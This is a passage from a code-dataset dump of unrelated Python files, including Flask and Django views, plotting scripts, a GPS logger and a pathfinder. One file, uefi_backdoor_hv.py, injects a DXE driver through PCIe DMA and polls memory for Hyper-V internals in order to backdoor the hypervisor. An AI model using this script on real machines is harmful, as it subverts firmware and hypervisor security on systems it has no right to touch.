QtCore.Qt.Key_Return:\n self.accept()\n\n @staticmethod\n def show_dialog(input_content='', arch='', mode=''):\n dialog = WriteInstructionDialog(input_content=input_content, arch=arch, mode=mode)\n result = dialog.exec_()\n\n return result == QDialog.Accepted, \\\n dialog.input_widget.text(), \\\n dialog.arch.currentText(), \\\n dialog.mode.currentText()\n","sub_path":"dwarf_debugger/ui/dialogs/dialog_write_instruction.py","file_name":"dialog_write_instruction.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"257857584","text":"# 1. створити файл\n# 2. прочитати\n# 3. змінити\n# 4. видалити\nfrom flask import Flask, request\nimport datetime\nimport os\nimport json\n\napp = Flask(__name__)\n\n\n@app.route('/file/task', methods=['GET', 'POST', 'PUT', 'DELETE'])\ndef file_tasks():\n if request.method == 'GET':\n \"\"\"get info from file\"\"\"\n path = \"/created_file.txt\"\n with open(path, \"r\") as file:\n return file.read()\n\n elif request.method == 'POST':\n \"\"\"create file\"\"\"\n dater = json.loads(request.data)\n data = f\"{dater}\\n\"\n with open('created_file.txt', \"w\") as new_file:\n new_file.write(data)\n return \"201\"\n elif request.method == \"PUT\":\n \"modify/update file\"\n dateti = json.loads(request.data)\n data = f\"{dateti}\\n\"\n with open('created_file.txt', \"a\") as new_file:\n new_file.write(data)\n return \"204\"\n elif request.method == 'DELETE':\n \"\"\"delete file\"\"\"\n os.remove(\"created_file.txt\")\n return \"204\"\n else:\n return '405'\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080)\n","sub_path":"file_helper.py","file_name":"file_helper.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177735692","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 12 17:53:23 2017\r\n\r\n@author: feebr01\r\n\"\"\"\r\n\r\nimport seaborn as sns\r\n\r\n########## DISTRIBUTION PLOTS\r\n\r\ntips = sns.load_dataset('tips')\r\ntips.head()\r\n\r\nsns.distplot(tips['total_bill'])\r\n\r\n#Compare relationships good\r\nsns.jointplot(x='total_bill', y='tip', data=tips, kind='scatter')\r\nsns.pairplot(tips, hue = 'sex', palette = 'coolwarm')\r\n\r\nsns.rugplot(tips['total_bill'])\r\n\r\n\r\n#################CATEGORICAL DATA W VALUES\r\nimport numpy as np\r\nsns.barplot(x='sex',y='total_bill',data=tips, estimator =np.std)\r\n\r\nsns.countplot(x='sex', data = tips)\r\n\r\nsns.boxplot(x='day', y='total_bill',data = tips, hue ='smoker')\r\n\r\nsns.violinplot(x='day', y='total_bill',data = tips)\r\n\r\nsns.stripplot(x='day', y='total_bill',data = tips, jitter = True)\r\n\r\nsns.swarmplot(x='day', y='total_bill',data = tips)\r\n\r\n\r\n################### MATRIX PLOTS\r\nflights = sns.load_dataset('flights')\r\n\r\n\r\nsns.heatmap(tips.corr(), annot = True)\r\n\r\n#Pivot data and make heatmap\r\npvt = flights.pivot_table(index = 'month', columns = 'year', values = 'passengers')\r\nsns.heatmap(pvt, linecolor= 'white' ,lw=.2)\r\n\r\n\r\nsns.clustermap(pvt, cmap='coolwarm')\r\n\r\n\r\n################### REGRESSIONPLOTS\r\n\r\n#color dots by sex\r\nsns.lmplot(x='total_bill', y='tip', data=tips, hue = 'sex')\r\n\r\n#separate charts side by side by sex\r\nsns.lmplot(x='total_bill', y='tip', data=tips, col = 'sex')\r\n\r\n# size = , aspect = \r\n\r\n##############GRID\r\n\r\niris = sns.load_dataset('iris')\r\n\r\nsns.pairplot(iris)\r\n\r\ng = 
sns.PairGrid(iris)\r\n\r\n#separate by rows and columns, map is display\r\ng = sns.FacetGrid(data=tips, col = 'time', row ='smoker')\r\ng.map(sns.distplot, 'total_bill')\r\n\r\n####################STYLES AND COLORS\r\nsns.set_context('talk')\r\nsns.countplot(x='sex', data=tips)\r\n\r\nsns.lmplot(x= 'total_bill', y = 'tip', data = tips, hue = 'sex', palette='seismic' )\r\n\r\n\r\n\r\n\r\n","sub_path":"Udemy Seaborn.py","file_name":"Udemy Seaborn.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"35376479","text":"import json\n\nimport numpy as np\nimport statistics as sts\n\nimport extras.parser as parser\nimport extras.functions as functions\nimport extras.utils as utils\nimport perceptron.autoencoder as ae\n\nwith open(\"config.json\") as file:\n config = json.load(file)\n\n# static non changeable vars\nerror_threshold: float = config[\"error_threshold\"]\n\n# read the files and get the dataset. There is no need to normalize data at this exercise\nfull_dataset, _ = parser.read_file(config[\"file\"], config[\"system_threshold\"])\n\n# activation function and its derived\nact_funcs = functions.get_activation_functions(config[\"system\"], config[\"beta\"])\n\n# normalize data\nif config[\"normalize\"]:\n full_dataset = parser.normalize_data(full_dataset)\n\n# extract the last % of the dataset\ndataset, rest = parser.extract_subset(full_dataset, config[\"training_ratio\"])\n\n# initializes the auto-encoder\nauto_encoder = ae.AutoEncoder(*act_funcs, config[\"mid_layout\"], len(dataset[0]), config[\"latent_dim\"],\n config[\"momentum\"], config[\"alpha\"])\n\n# randomize w if asked\nif bool(config[\"randomize_w\"]):\n auto_encoder.randomize_w(config[\"randomize_w_ref\"], config[\"randomize_w_by_len\"])\n\nplot_bool = bool(config[\"plot\"])\n\n# initialize plotter\nif plot_bool:\n utils.init_plotter()\n\n# get pm from config\npm: float = config[\"denoising\"][\"pm\"]\n\n# use minimizer if asked\nif config[\"optimizer\"] != \"None\" and config[\"optimizer\"] != \"\":\n # randomize the dataset\n dataset = parser.randomize_data(dataset, config[\"data_random_seed\"])\n # train with minimize\n auto_encoder.train_minimizer(parser.add_noise_dataset(dataset, pm), dataset, config[\"trust\"], config[\"use_trust\"], config[\"optimizer\"], config[\"optimizer_iter\"], config[\"optimizer_fev\"])\n # plot error vs opt step\n utils.plot_values(range(len(auto_encoder.opt_err)), 'opt step', auto_encoder.opt_err, 'error', sci_y=False)\nelse:\n # vars for plotting\n ep_list = []\n err_list = []\n\n # train auto-encoder\n for ep in range(config[\"epochs\"]):\n\n # randomize the dataset everytime\n dataset = parser.randomize_data(dataset, config[\"data_random_seed\"])\n\n # train for this epoch\n for data in dataset:\n auto_encoder.train(parser.add_noise(data, pm), data, config[\"eta\"])\n\n # apply the changes\n auto_encoder.update_w()\n\n # calculate error\n error: float = auto_encoder.error(parser.add_noise_dataset(dataset, pm), dataset, config[\"trust\"], config[\"use_trust\"])\n if error < config[\"error_threshold\"]:\n break\n\n if ep % 50 == 0:\n print(f'Iteration {ep}, error {error}')\n\n # add error to list\n ep_list.append(ep)\n err_list.append(error)\n \n # plot error vs epoch\n if plot_bool:\n utils.plot_values(ep_list, 'epoch', err_list, 'error', sci_y=False)\n\n# labels for printing (use with full_dataset)\nlabels: [] = ['@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 
'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\\\', ']', '^', '_']\n\nPM_ITER = 50\n\npm_values = [pm / 4, pm, pm * 2.5]\nx_superlist = []\nerr_superlist = []\nleg_list = ['pm=0,0625', 'pm=0,25', 'pm=0,625']\nfor pm_it in pm_values:\n    err_mean: [] = []\n    for data in full_dataset:\n        aux: [] = []\n        for i in range(PM_ITER):\n            noisy_res = auto_encoder.activation(parser.add_noise(data, pm_it))\n            aux.append(np.sum(abs(np.around(noisy_res[1:]) - data[1:])) / len(data[1:]))\n        letter_err_mean = sts.mean(aux)\n        err_mean.append(letter_err_mean)\n    x_superlist.append(range(len(full_dataset)))\n    err_superlist.append(err_mean)\n    print(f'Using pm={pm_it}, error mean is {sts.mean(err_mean)}')\n\nif plot_bool:\n    utils.plot_multiple_values(x_superlist, 'Letter', err_superlist, 'Invalid bits', leg_list, sci_y=False, xticks=labels, min_val_y=0, max_val_y=1)\n    utils.plot_stackbars(x_superlist, 'Letter', err_superlist, 'Invalid bits', leg_list, sci_y=False, xticks=labels, min_val_y=0, max_val_y=1)\n\n    # hold execution\n    utils.hold_execution()\n","sub_path":"denoising.py","file_name":"denoising.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"95923973","text":"#!/home/blogenv/bin/python\n# -*- coding: utf-8 -*-\nfrom django.shortcuts import render,get_object_or_404,redirect\nfrom blog.models import Post\nfrom .models import Comment\nfrom .forms import CommentForm\nfrom users.models import User\n\n# Create your views here.\n# View function for posting a comment\ndef post_comment(request,post_pk,user_pk):\n    # Get the current post object and the logged-in user object\n    post=get_object_or_404(Post,pk=post_pk)\n    user=get_object_or_404(User,pk=user_pk)\n    # If the request method is POST\n    if request.method=='POST':\n        form=CommentForm(request.POST)\n        # If the form data is valid\n        if form.is_valid():\n            # Create the comment object without saving it to the database yet\n            comment=form.save(commit=False)\n\n            comment.post=post\n            comment.user=user\n\n            # Save the comment form data to the database, then redirect to the current page\n            comment.save()\n            return redirect(post)\n        else:\n            # Get the list of all current comments\n            comment_list=post.comment_set.all()\n            # Keep the current form contents, the post and the comment list, then re-render the page\n            context={\n                'post':post,\n                'form':form,\n                'comment_list':comment_list\n            }\n            return render(request,'blog/detail.html',context=context)\n    else:\n        # On a GET request, refresh the page\n        return redirect(post)","sub_path":"comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"581173268","text":"#!/usr/bin/python\r\n# _*_coding: utf-8 _*_\r\n\r\nimport os\r\nimport sys\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nurl = \"https://news.sina.com.cn/china/\" #IEEE.sh\r\nres = requests.get(url)\r\n\r\nres.encoding = 'utf-8'\r\n#soup = BeautifulSoup(res.text, 'lxml')\r\n#print(soup.title.text)\r\nsoup=BeautifulSoup(res.text,'html.parser')\r\n#print(soup.text)\r\nif os.path.exists(\"code/news.txt\"):\r\n    os.remove(\"code/news.txt\")\r\ngetnews =\"\"\r\nfor news in soup.select(\".right-content\"):\r\n    #print(news)\r\n    #print (news.select(\"a\"))\r\n    new_as=news.select(\"a\")\r\n    for news_a in new_as:\r\n        getnews = getnews + (news_a.text) +('\\n')\r\n\r\nprint(\"[+] News fetched (from: \" + url + \"):\")\r\nprint(getnews)\r\n\r\n\r\nwith open('code/news.txt','w') as f:\r\n    f.write(getnews)","sub_path":"code/getnews.py","file_name":"getnews.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"420827866","text":"#! 
/usr/bin/python\n# Author: Nordine Sebkhi\n\nfrom gps import *\nfrom time import *\nimport time\nimport threading\nfrom datetime import datetime\nfrom math import cos, sin, radians, degrees, atan2\n\n\nclass GpsReader(threading.Thread):\n\n def __init__(self, outputDir):\n threading.Thread.__init__(self)\n self.gpsPoller = GpsPoller()\n self.outDir = outputDir\n\n def run(self):\n print(\"GPS: Connecting...\")\n self.gpsPoller.start()\n\n gpsFound = False\n prevLat = 0\n prevLon = 0\n bearing = 0\n\n while True:\n gpsData = self.gpsPoller.getCurrentValue()\n\n if (gpsData is not None and hasattr(gpsData, 'mode') and gpsData.mode == 3):\n\n # Get time stamp of current sample\n ts = datetime.now()\n\n # Create new file at each new data collection\n if not gpsFound:\n print(\"GPS : Connected!!\")\n gpsFound = True\n gpsFile = self.outDir + \"gps_{0}-{1}-{2}_{3}-{4}-{5}.csv\".format(\n ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)\n\n with open(gpsFile, 'w') as f:\n f.write('LAT,LON,BEARING,ALT,SPEED,CLIMB,GPS_TIME,RPI_TIME\\n')\n\n # Append gps data\n timeGPS = gpsData.time\n lat = gpsData.lat # Degrees (North:+ South:-)\n lon = gpsData.lon # Degrees (East:+ West:-)\n alt = gpsData.alt # Meters\n speed = gpsData.speed # Meters per second\n climb = gpsData.climb # Climb(+) or Sink(-) in meters per second\n\n # Update Bearing\n if (prevLat != 0):\n bearing += self.getBearing(prevLat, prevLon, lat, lon)\n\n # Write results to output file\n with open(gpsFile, 'a') as f:\n f.write('{0},{1},{2},{3},{4},{5},{6},{7}\\n'.format(\n lat, lon, bearing, alt, speed, climb, timeGPS, ts))\n\n # Prepare for next iteration\n prevLat = lat\n prevLon = lon\n time.sleep(0.5)\n\n def getBearing(self, lat_start_deg, lon_start_deg, lat_end_deg, lon_end_deg):\n latStart = radians(lat_start_deg)\n lonStart = radians(lon_start_deg)\n latEnd = radians(lat_end_deg)\n lonEnd = radians(lon_end_deg)\n\n d_Lon = lonEnd - lonStart\n\n x = cos(latEnd) * sin(d_Lon)\n y = cos(latStart) * sin(latEnd) - sin(latStart) * cos(latEnd) * cos(d_Lon)\n\n bearingRad = atan2(x, y)\n return ((degrees(bearingRad) + 360.0) % 360)\n\n\nclass GpsPoller(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n self.current_value = None\n\n def getCurrentValue(self):\n return self.current_value\n\n def run(self):\n\n gpsd = gps(mode=WATCH_ENABLE) # starting the stream of info\n\n try:\n while True:\n self.current_value = gpsd.next()\n\n except StopIteration:\n pass\n\n##################################\n# Test\n#############################\nif __name__ == \"__main__\":\n latStart = 39.099912\n lonStart = -94.581213\n latEnd = 38.627089\n lonEnd = -90.200203\n\n gpsReader = GpsReader(\"don't care'\")\n bearing = gpsReader.getBearing(latStart, lonStart, latEnd, lonEnd)\n print(\"Bearing (deg) = {0:f}\".format(bearing))","sub_path":"gpsReader.py","file_name":"gpsReader.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"169073929","text":"from PIL import Image, ImageDraw\nfrom random import randint, randrange, choice\nimport sys\nsys.setrecursionlimit(2000)\n\nclass Data:\n def __init__(self, file):\n self.file = file\n self.list_of_rows = []\n with open(self.file) as data:\n for line in data.readlines():\n self.list_of_rows.append([int(num) for num in line.split()])\n self.width = len(self.list_of_rows[0])\n self.height = len(self.list_of_rows)\n self.min = min([min(row) for row in self.list_of_rows])\n self.max = 
max([max(row) for row in self.list_of_rows])\n\n def rgb(self, point_x, point_y):\n rgb_value = int(((self.list_of_rows[point_y][point_x] - self.min) / (self.max - self.min)) * 255)\n return (rgb_value, rgb_value, rgb_value)\n\n def get_elevation(self, point):\n return self.list_of_rows[point[1]][point[0]]\n\n def get_rgb(self, point):\n return self.rgb(point[0], point[1])[0]\n\nclass Map:\n def __init__(self, data):\n self.data = data\n self.image = Image.new('RGB', (self.data.width, self.data.height))\n self.draw = ImageDraw.Draw(self.image)\n\n def draw_map(self):\n for y in range(self.data.height):\n for x in range(self.data.width):\n self.draw.point((x, y), self.data.rgb(x, y))\n return self\n\n def draw_path(self, path, color):\n for point in path[1]:\n self.draw.point(point, color)\n return self\n\n def display(self):\n return self.image.show()\n\nclass Pathfinder:\n def __init__(self, data):\n self.data = data\n self.recursive_results = {}\n self.iterative_results = []\n\n def greedy_path(self, starting_point):\n current_point = starting_point\n path_cost = 0\n path = []\n path.append(current_point)\n for step in range(self.data.width-1):\n up = (step+1, max(current_point[1]-1, 0))\n straight = (step+1, current_point[1])\n down = (step+1, min(current_point[1]+1, self.data.height-1))\n choices = [up, straight, down]\n\n up_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(up))\n straight_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(straight))\n down_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(down))\n costs = [up_cost, straight_cost, down_cost]\n\n choices_costs = dict(zip(choices, costs))\n sorted_choices = sorted(choices_costs, key=choices_costs.__getitem__)\n\n if up_cost >= straight_cost <= down_cost:\n path_cost += straight_cost\n path.append(straight)\n current_point = straight\n elif up_cost == down_cost:\n options = [up, down]\n decision = choice(options)\n path_cost += choices_costs[decision]\n path.append(decision)\n current_point = decision \n else:\n path_cost += choices_costs[sorted_choices[0]]\n path.append(sorted_choices[0])\n current_point = sorted_choices[0]\n\n return (path_cost, path)\n\n\n def recursive_best(self, starting_point):\n if starting_point in self.recursive_results:\n return self.recursive_results[starting_point]\n\n current_point = starting_point\n \n up = (current_point[0]+1, max(current_point[1]-1, 0))\n straight = (current_point[0]+1, current_point[1])\n down = (current_point[0]+1, min(current_point[1]+1, self.data.height-1))\n choices = [up, straight, down]\n\n up_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(up))\n straight_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(straight))\n down_cost = abs(self.data.get_elevation(current_point)-self.data.get_elevation(down))\n costs = [up_cost, straight_cost, down_cost]\n\n choices_costs = dict(zip(choices, costs))\n sorted_choices = sorted(choices_costs, key=choices_costs.__getitem__)\n\n if current_point[0] == self.data.width - 2:\n self.recursive_results[current_point] = (choices_costs[sorted_choices[0]], [sorted_choices[0]])\n return self.recursive_results[current_point]\n\n paths = [self.recursive_best(point) for point in choices]\n new_paths = [(paths[0][0]+costs[0], [current_point]+paths[0][1]),\n (paths[1][0]+costs[1], [current_point]+paths[1][1]),\n (paths[2][0]+costs[2], [current_point]+paths[2][1])]\n sorted_paths = sorted(new_paths, key=lambda x: x[0])\n 
self.recursive_results[current_point] = sorted_paths[0]\n return self.recursive_results[current_point]\n\n\n def iterative_best(self, starting_point):\n new_data = [column for column in zip(*self.data.list_of_rows)]\n self.iterative_results = [(0, [(len(new_data)-1, y)]) for y, point in enumerate(new_data[-1])]\n\n for x, column in enumerate(new_data[-2::-1]):\n new_results = []\n for y, point in enumerate(column):\n current_point = ((len(new_data)-x)-2, y)\n up_path = [current_point] + self.iterative_results[max(y-1, 0)][1]\n straight_path = [current_point] + self.iterative_results[y][1]\n down_path = [current_point] + self.iterative_results[min(y+1, len(new_data[0])-1)][1]\n\n up_cost = abs(point-self.data.get_elevation(up_path[1]))\n straight_cost = abs(point-self.data.get_elevation(straight_path[1]))\n down_cost = abs(point-self.data.get_elevation(down_path[1]))\n\n up_choice = (up_cost + self.iterative_results[y][0], up_path)\n straight_choice = (straight_cost + self.iterative_results[y][0], straight_path)\n down_choice = (down_cost + self.iterative_results[y][0], down_path)\n\n choices = [up_choice, straight_choice, down_choice]\n sorted_choices = sorted(choices, key=lambda x: x[0])\n new_results.append(sorted_choices[0])\n self.iterative_results = new_results\n \n return self.iterative_results\n\ndata = Data('elevation_large.txt')\na_map = Map(data)\na_map.draw_map()\npaths = []\npathfinder = Pathfinder(data)\n\n\n#Greedy algorithm\nfor y in range(data.height - 1):\n path = pathfinder.greedy_path((0, y))\n a_map.draw_path(path, (0, 255, 0))\n paths.append(path)\nsorted_paths = sorted(paths, key=lambda x: x[0])\na_map.draw_path(sorted_paths[0], (0, 0, 255))\na_map.display()\nprint(sorted_paths[0][0])\n\n#Iterative algorithm\n# paths = pathfinder.iterative_best((0, 300))\n# for path in paths:\n# a_map.draw_path(path, (0, 255, 0))\n# sorted_paths = sorted(paths, key=lambda x: x[0])\n# a_map.draw_path(sorted_paths[0], (0, 0, 255))\n# a_map.display()\n# print(sorted_paths[0][0])\n\n#Recursive algorithm\n# for y in range(data.height - 1):\n# path = pathfinder.recursive_best((0, y))\n# a_map.draw_path(path, (0, 255, 0))\n# paths.append(path)\n# sorted_paths = sorted(paths, key=lambda x: x[0])\n# a_map.draw_path(sorted_paths[0], (0, 0, 255))\n# a_map.display()\n# print(sorted_paths[0][0])","sub_path":"pathfinder_with_classes.py","file_name":"pathfinder_with_classes.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25430485","text":"import serial\nimport matplotlib.pyplot as plt\nimport math\nimport scipy.optimize\nimport numpy as np\nfrom more_itertools import *\n\n\ndef frequency_motor(s, run_time, frequency, gain):\n s.write(b'time report on\\n')\n s.write(b'motor left report on\\n')\n\n start_time = None\n p = None\n\n times = []\n positions = []\n powers = []\n\n while True:\n line = s.readline()\n if b',' in line and b':' in line:\n time = None\n position = None\n\n words = line.split(b',')\n for word in words:\n parts = word.split(b':')\n if parts[0] == b'T':\n try:\n time = int(parts[1])\n except ValueError:\n print('Error parsing {} from {}'.format(parts[1], line))\n elif parts[0] == b'LM':\n try:\n position = int(parts[1])\n except ValueError:\n print('Error parsing {} from {}'.format(parts[1], line))\n\n if start_time is None:\n start_time = time\n else:\n time = time - start_time\n if time is not None and position is not None:\n times.append(time)\n positions.append(position)\n 
powers.append(p)\n\n            if time % 10 == 0:\n                p = gain / 2 + gain / 2 * math.sin(2 * math.pi * time * frequency)\n                s.write(b'motor left set %d\\n' % p)\n\n            if time >= run_time:\n                s.write(b'motor left set 0\\n')\n                s.write(b'motor left report off\\n')\n                s.write(b'time report off\\n')\n                break\n\n    return times, positions, powers\n\n\ns = serial.Serial('/dev/ttyUSB0', 230400, timeout=1)\n\n\ndef calc_velocity(d):\n    (last_time, last_position), (next_time, next_position) = d\n    return (next_position - last_position) - (next_time - last_time)\n\n\ntimes, positions, powers = frequency_motor(s, 5000, 0.002, 10000)\n\ntimes, positions, powers = unzip(filter(lambda d: d[0] >= 1000, zip(times, positions, powers)))\n\ntimes = list(times)\npositions = list(positions)\npowers = list(powers)\n\nvelocities = list(map(calc_velocity, windowed(zip(times, positions), 2)))\n\nvelocities.append(last(velocities))\n\n\ndef sine(t, offset, gain, frequency, phase):\n    return offset + gain * np.sin(2*math.pi*t*frequency + phase)\n\n\npopt, pcov = scipy.optimize.curve_fit(sine, times, velocities, p0=[3, 2.5, 0.002, 0])\n\nprint(popt)\nprint(pcov)\n\nfit_velocities = list(map(lambda t: sine(t, *popt), times))\n\nplt.plot(\n    #times, velocities,\n    times, list(map(lambda p: p / 1000 if p is not None else None, powers)),\n    times, fit_velocities,\n    linewidth=1\n)\nplt.show()\n","sub_path":"software/micromouse_analysis/analyze_frequency_motors.py","file_name":"analyze_frequency_motors.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"56677","text":"from flask import Flask, request, jsonify, make_response, abort\nfrom werkzeug.exceptions import HTTPException\n\nfrom db import db\n\napp = Flask(__name__)\n\n\n@app.errorhandler(HTTPException)\ndef err_handler(error):\n    return make_response(jsonify({'status': error.code,\n                                  'reason': error.description}), error.code)\n\n\ndef validate_post(err_code):\n    if not request.json:\n        abort(err_code, \"Fields are required\")\n    if 'movie' not in request.json:\n        abort(err_code, \"Field 'movie' is required\")\n\n    for i in ['title', 'year', 'director', 'length', 'rating']:\n        if i not in request.json['movie']:\n            abort(err_code, \"Field '\" + i + \"' is required\")\n\n\ndef gen_return(movie):\n    return {\"movie\": {\n        \"id\": movie.id,\n        \"title\": movie.title,\n        \"year\": movie.year,\n        \"director\": movie.director,\n        \"length\": movie.length,\n        \"rating\": movie.rating\n    }}\n\n\ndef get_movies():\n    ret = {\"list\": []}\n    for movies in db.session.query(db.Movies):\n        ret[\"list\"].append(gen_return(movies)['movie'])\n    return jsonify(ret)\n\n\ndef post_movies():\n    validate_post(500)\n    json_inp = request.json['movie']\n    try:\n        movie = db.Movies(json_inp['title'], json_inp['year'],\n                          json_inp['director'], json_inp['length'],\n                          json_inp['rating'])  # TODO: should the id sent by the client really be used?\n    except AssertionError as e:\n        abort(400, e.args[0])\n    else:\n        db.session.add(movie)\n        db.session.commit()\n    return jsonify(gen_return(movie))\n\n\ndef get_one_movies(movies_id):\n    movie = db.session.query(db.Movies).get(movies_id)\n    if movie is None:\n        abort(404, \"Movie not found\")\n    return jsonify(gen_return(movie))\n\n\ndef patch_movie(movies_id):\n    validate_post(400)  # The status code is a parameter because the assignment specifies different codes\n    movie = db.session.query(db.Movies).get(movies_id)\n    if movie is None:\n        abort(404, \"Movie not found\")\n    json_inp = request.json['movie']\n\n    try:\n        movie.title = json_inp['title']\n        movie.year 
= json_inp['year']\n movie.director = json_inp['director']\n movie.length = json_inp['length']\n movie.rating = json_inp['rating']\n except AssertionError as e:\n abort(400, e.args[0])\n else:\n db.session.commit()\n return jsonify(gen_return(movie))\n\n\ndef delete_movie(movies_id):\n movie = db.session.query(db.Movies).get(movies_id)\n if movie is None:\n abort(404, \"Movie not found\")\n db.session.delete(movie)\n db.session.commit()\n return make_response(jsonify(\"Accepted\"), 202)\n\n\n@app.route('/api/movies', methods=[\"GET\", \"POST\"])\ndef api_movies():\n if request.method == \"GET\":\n return get_movies()\n elif request.method == \"POST\":\n return post_movies()\n\n\n@app.route('/api/movies/', methods=[\"GET\", \"PATCH\", \"DELETE\"])\ndef api_movies_ids(movies_id):\n if request.method == \"GET\":\n return get_one_movies(movies_id)\n elif request.method == \"PATCH\":\n return patch_movie(movies_id)\n elif request.method == \"DELETE\":\n return delete_movie(movies_id)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"133054155","text":"#!/usr/bin/python3\n\"\"\"\nUse fabric to create tgz file of static code\n\"\"\"\nfrom fabric.api import local, task, env\nfrom datetime import datetime\n\n\n@task\ndef do_pack():\n \"\"\"\n Run tar command to compress files\n \"\"\"\n now = datetime.now()\n file_name = \"web_static_{}{}{}{}{}{}.tgz\".format(\n now.year,\n now.month,\n now.day,\n now.hour,\n now.minute,\n now.second\n )\n try:\n local(\"sudo tar -cvzf {} ./web_static\".format(file_name))\n local(\"sudo mkdir -p versions\")\n local(\"sudo mv ./{} versions/\".format(file_name))\n except:\n return (None)\n return (\"versions/{}\".format(file_name))\n","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1772173","text":"#!/usr/bin/env python\n\nimport sys, os\nfrom struct import pack, unpack\nfrom hexdump import hexdump\n\nfrom pcie_lib import *\nfrom uefi import *\n\nHV_INFO_ADDR = STATUS_ADDR - (8 * 5)\n\ndef main():\n\n payload = sys.argv[1] if len(sys.argv) > 1 else None\n\n dev = dxe_inject(payload = payload)\n \n if payload is None: return 0\n\n print('[+] DXE driver was planted, waiting for backdoor init...') \n\n while True:\n\n # wait for DXE backdoor\n status = dev.mem_read_8(STATUS_ADDR)\n \n if status == 0:\n\n # not ready yet\n time.sleep(1)\n continue\n\n print('[+] DXE driver was executed')\n\n break\n\n print('[+] Waiting for Hyper-V init...')\n\n dev.mem_write_8(HV_INFO_ADDR, 0)\n\n while True:\n\n # wait for hypervisor\n status, winload_cr3, hv_cr3, hv_entry, hv_base = unpack('qQQQQ', dev.mem_read(HV_INFO_ADDR, 8 * 5))\n\n if status == 0:\n\n # not ready yet\n time.sleep(1)\n continue\n\n if status == -1:\n\n print('ERROR: DXE driver is unable to locate winload.efi')\n break\n\n if status == -2:\n\n print('ERROR: DXE driver is unable to locate winload!HvlpBelow1MbPage')\n break\n\n if status == -3:\n\n print('ERROR: HvlpBelow1MbPage is not allocated, Hyper-V wasn\\'t started')\n break\n\n if status == -4:\n\n print('ERROR: DXE driver is unable to locate winload!HvlpTransferToHypervisor')\n break\n\n print('[+] Hyper-V image entry was executed\\n')\n print(' Winload CR3: 0x%.16x' % winload_cr3)\n print(' Hyper-V CR3: 0x%.16x' % 
hv_cr3)\n print(' Hyper-V VM exit handler: 0x%.16x' % hv_base)\n print(' Hyper-V image entry: 0x%.16x\\n' % hv_entry)\n\n break\n\n print('[+] DONE')\n \n dev.close()\n\n return 0\n\nif __name__ == '__main__':\n\n exit(main())\n","sub_path":"python/uefi_backdoor_hv.py","file_name":"uefi_backdoor_hv.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"504063154","text":"\"\"\"\nQ001\nTwo Sum\nEasy\n\n04/01/2021 revisit\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n save = {}\n for i in range(len(nums)):\n if target-nums[i] not in save:\n save[nums[i]] = i\n else:\n return [i, save[target-nums[i]]]\n\n\nnums = [2, 7, 11, 15]\ntarget = 13\n\nsol = Solution()\nprint(sol.twoSum(nums, target))\n\n\n\n","sub_path":"Q001-v2.py","file_name":"Q001-v2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197480708","text":"import streamlit as st\nimport os\nimport PIL\nimport streamlit.components.v1 as stc\n\n\ndef write():\n st.set_option('deprecation.showfileUploaderEncoding', False)\n st.title(\"Flurosis Tooth Detection By A.Adithya Sherwood IX-E\")\n st.subheader('Disclaimer: Please check with your local specialized dentist, if you are in doubt please try atleast twice.')\n conf_score = st.slider('Please Choose A Confidence Value',0.1,1.0,0.05)\n uploaded_file = st.file_uploader(\"Choose an image\", type=\"jpg\") \n\n \n if uploaded_file is not None:\n image = PIL.Image.open(uploaded_file)\n image = image.resize((416,416))\n image.save(f'./Test_Flurosis.jpg')\n image_flurosis = open(f'./Test_Flurosis.jpg','rb')\n st.image(image, caption='Uploaded Image.', use_column_width=True)\n st.write(\"\")\n os.system(f\"python3 detect.py --weights './weights/best (2).pt' --img 416 --conf {str(conf_score)} --source ./Test_Flurosis.jpg --output ./test.jpg\")\n image_pred = PIL.Image.open(f'./test.jpg')\n st.image(image_pred, 